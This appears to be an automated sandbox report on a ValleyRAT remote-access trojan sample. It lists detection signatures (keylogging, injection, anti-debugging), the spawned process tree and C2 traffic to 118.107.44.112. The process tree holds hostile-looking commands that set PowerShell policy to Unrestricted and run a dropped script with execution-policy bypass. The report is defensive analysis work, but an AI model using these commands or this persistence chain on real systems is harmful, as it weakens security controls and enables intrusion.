Windows Analysis Report
S1Rv3ioghk.exe

Overview

General Information

Sample name: S1Rv3ioghk.exe (renamed because the original name is a hash value)
Original sample name: FD7EC2C34E2593E4D606E0A9D37E257A.exe
Analysis ID: 1581258
MD5: fd7ec2c34e2593e4d606e0a9d37e257a
SHA1: aac4d5282290c1da30acbf00703c02c5e6ee4b6e
SHA256: 17a742ca6bd9bd88de4f83074d17d1f74faec1b04d177bef710229c77d9e6e21
Tags: exe, ValleyRAT, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to many ports of the same IP (likely port scanning)
Contains functionality to capture and log keystrokes
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Loading BitLocker PowerShell Module
Sigma detected: Execution from Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Suspicious Program Location with Network Connections
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Installs a global mouse hook
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sleep loop found (likely to delay execution)
Stores large binary data to the registry
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • S1Rv3ioghk.exe (PID: 6364 cmdline: "C:\Users\user\Desktop\S1Rv3ioghk.exe" MD5: FD7EC2C34E2593E4D606E0A9D37E257A)
    • cmd.exe (PID: 2828 cmdline: "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bulete\program\ShellExperienceHosts.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • ShellExperienceHosts.exe (PID: 5868 cmdline: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe MD5: 0922B22053A6D5D9516EA910D34A4771)
        • cmd.exe (PID: 4312 cmdline: cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tasklist.exe (PID: 5816 cmdline: tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 3412 cmdline: findstr /I "ShellExperienceHosts.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 5228 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 1988 cmdline: tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 5368 cmdline: findstr /I "ShellExperienceHosts.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 3588 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 4940 cmdline: tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 2852 cmdline: findstr /I "ShellExperienceHosts.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 4548 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 6296 cmdline: tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 6264 cmdline: findstr /I "ShellExperienceHosts.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 6448 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
        • cmd.exe (PID: 2488 cmdline: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 6104 cmdline: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 5428 cmdline: cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 6692 cmdline: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe, CommandLine: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe, NewProcessName: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe, OriginalFileName: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bulete\program\ShellExperienceHosts.exe, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2828, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe, ProcessId: 5868, ProcessName: ShellExperienceHosts.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe, ParentImage: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe, ParentProcessId: 5868, ParentProcessName: ShellExperienceHosts.exe, ProcessCommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ProcessId: 2488, ProcessName: cmd.exe
Source: Network Connection; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: DestinationIp: 118.107.44.112, DestinationIsIpv6: false, DestinationPort: 18852, EventID: 3, Image: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe, Initiated: true, ProcessId: 5868, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49771
Source: Process started; Author: frack113; Data: Command: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2488, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ProcessId: 6104, ProcessName: powershell.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2488, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ProcessId: 6104, ProcessName: powershell.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-27T09:20:45.215284+0100 | 2052875 | 1 | A Network Trojan was detected | 192.168.2.4 | 49782 | 118.107.44.112 | 18091 | TCP
2024-12-27T09:21:56.244401+0100 | 2052875 | 1 | A Network Trojan was detected | 192.168.2.4 | 49793 | 118.107.44.112 | 18091 | TCP

AV Detection

Source: C:\Users\Public\Bulete\program\yyzyBase.dll; ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Temp\backup.dll; ReversingLabs: Detection: 82%
Source: S1Rv3ioghk.exe; Virustotal: Detection: 66%
Source: S1Rv3ioghk.exe; ReversingLabs: Detection: 65%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.4% probability
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe; Code function: 3_2_6C6B8E2D CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,___std_exception_copy,CryptReleaseContext,___std_exception_copy,CryptDestroyKey,CryptReleaseContext,___std_exception_copy,CryptDestroyKey,CryptReleaseContext,___std_exception_copy,___std_exception_copy,3_2_6C6B8E2D
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe; Code function: 3_2_6C6B8792 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptReleaseContext,___std_exception_copy,CryptDestroyHash,CryptReleaseContext,___std_exception_copy,CryptDestroyHash,CryptReleaseContext,___std_exception_copy,CryptReleaseContext,___std_exception_copy,CryptDestroyHash,CryptReleaseContext,___std_exception_copy,___std_exception_copy,3_2_6C6B8792
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe; Code function: 3_2_6C6B84FC CryptStringToBinaryA,CryptStringToBinaryA,___std_exception_copy,3_2_6C6B84FC
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: -----BEGIN PUBLIC KEY-----

Compliance

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe; Unpacked PE file: 3.2.ShellExperienceHosts.exe.3320000.6.unpack
Source: S1Rv3ioghk.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2548437777.0000000006F32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdbp source: powershell.exe, 00000011.00000002.2554932130.00000000080E2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2548323378.0000000006F26000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\buildslave\unity\build\artifacts\WindowsPlayer\Win32_VS2019_nondev_i_r\WindowsPlayer_Master_il2cpp_x86.pdb source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B40000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, ShellExperienceHosts.exe, 00000003.00000000.1706516163.000000000040C000.00000002.00000001.01000000.00000005.sdmp, ShellExperienceHosts.exe.0.dr, backup.exe.3.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2548437777.0000000006F6F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2528351985.00000000028CF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ?COMCTL32.dllWINHTTP.dllcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -FS -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASMLoad file into cachecrypto\x509\by_file.cunspecified certificate verification errorunable to get issuer certificateunable to get certificate CRLunable to decrypt certificate's signatureunable to decrypt CRL's signatureunable to decode issuer public keycertificate signature failureCRL signature failurecertificate is not yet validcertificate has expiredCRL is not yet validCRL has expiredformat error in certificate's notBefore fieldformat error in certificate's notAfter fieldformat error in CRL's lastUpdate fieldformat error in CRL's nextUpdate fieldout of memoryself signed certificateself signed certificate in certificate chainunable to get local issuer certificateunable to verify the first certificatecertificate chain too longcertificate revokedinvalid CA certificatepath length constraint exceededunsupported certificate purposecertificate not trustedcertificate rejectedsubject issuer mismatchauthority and subject key identifier mismatchauthority and issuer serial number mismatchkey usage does not include certificate signingunable to get CRL issuer certificateunhandled critical extensionkey usage does not include CRL signingunhandled critical CRL extensioninvalid non-CA certificate (has CA markings)proxy path length constraint exceededkey usage does not include digital signatureproxy certificates not allowed, please set the appropriate flaginvalid or inconsistent certificate extensioninvalid or inconsistent certificate policy extensionno explicit policyDifferent CRL scopeUnsupported extension featureRFC 3779 resource not subset of parent's 
resourcespermitted subtree violationexcluded subtree violationname constraints minimum and maximum not supportedapplication verification failureunsupported name constraint typeunsupported or invalid name constraint syntaxunsupported or invalid name syntaxCRL path validation errorPath LoopSuite B: certificate version invalidSuite B: invalid public key algorithmSuite B: invalid ECC curveSuite B: invalid signature algorithmSuite B: curve not allowed for this LOSSuite B: cannot sign P-384 with P-256Hostname mismatchEmail address mismatchIP address mismatchNo matching DANE TLSA recordsEE certificate key too weakCA certificate key too weakCA signature digest algorithm too weakInvalid certificate verification contextIssuer certificate lookup errorCertificate Transparency required, but no valid SCTs foundproxy subject name violationOCSP verification neededOCSP verification failedOCSP unknown certCertificate public key has explicit ECC parametersunknown certificate verification errorcrypto\asn1\x_info.ccrypto\pem\pem_info.cRSA P
Source: Binary string: H:\func_v12_i18n_202411_branch\Build\Release\WPSOffice\office6\addons\konlinesetup_xa\konlinesetup_xa.pdb source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -FS -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe; File opened: z:
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe; File opened: x:
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe; File opened: v:
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe; File opened: t:
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe; File opened: r:
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe; File opened: p:
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe; File opened: n:
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe; File opened: l:
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe; File opened: j:
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe; File opened: h:
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe; File opened: f:
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe; File opened: b:
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe; File opened: y:
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe; File opened: w:
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe; File opened: u:
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe; File opened: s:
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe; File opened: q:
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe; File opened: o:
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe; File opened: m:
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe; File opened: k:
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe; File opened: i:
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe; File opened: g:
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe; File opened: e:
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: c:
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe; File opened: [:
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe; Code function: 3_2_6C7BC637 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,3_2_6C7BC637
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe; Code function: 3_2_033280F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,3_2_033280F0

Networking

Source: Network traffic; Suricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49782 -> 118.107.44.112:18091
Source: Network traffic; Suricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49793 -> 118.107.44.112:18091
Source: global traffic; TCP traffic: 118.107.44.112 ports 18852,18091,1,2,5,8
Source: global traffic; TCP traffic: 192.168.2.4:49771 -> 118.107.44.112:18852
Source: Joe Sandbox View; ASN Name: BCPL-SGBGPNETGlobalASNSG BCPL-SGBGPNETGlobalASNSG
Source: unknown; TCP traffic detected without corresponding DNS query: 118.107.44.112 (50 identical entries)
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe; Code function: 3_2_03323360 recv,timeGetTime,_memmove,3_2_03323360
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe.0.dr, backup.exe.3.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe.0.dr, backup.exe.3.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1703674641.0000000000640000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1704068985.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr, ShellExperienceHosts.exe.0.dr, backup.exe.3.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe.0.dr, backup.exe.3.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1703674641.0000000000640000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1704068985.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr, ShellExperienceHosts.exe.0.dr, backup.exe.3.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1703674641.0000000000640000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1704068985.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr, ShellExperienceHosts.exe.0.dr, backup.exe.3.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1703674641.0000000000640000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1704068985.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr, ShellExperienceHosts.exe.0.dr, backup.exe.3.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: S1Rv3ioghk.exe, yyzyBase.dll.0.dr, backup.dll.3.dr; String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powershell.exe, 00000010.00000002.2527730762.0000000002A97000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2528351985.00000000028CF000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000011.00000002.2548437777.0000000006F6F000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.mi#
Source: powershell.exe, 00000011.00000002.2548437777.0000000006F32000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.micro#:
Source: powershell.exe, 00000011.00000002.2549179185.0000000006FAB000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.microf?
Source: S1Rv3ioghk.exe, yyzyBase.dll.0.dr, backup.dll.3.dr; String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: S1Rv3ioghk.exe, yyzyBase.dll.0.dr, backup.dll.3.dr; String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: S1Rv3ioghk.exe, yyzyBase.dll.0.dr, backup.dll.3.dr; String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1703674641.0000000000640000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1704068985.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr, ShellExperienceHosts.exe.0.dr, backup.exe.3.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe.0.dr, backup.exe.3.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe.0.dr, backup.exe.3.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1703674641.0000000000640000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1704068985.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr, ShellExperienceHosts.exe.0.dr, backup.exe.3.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
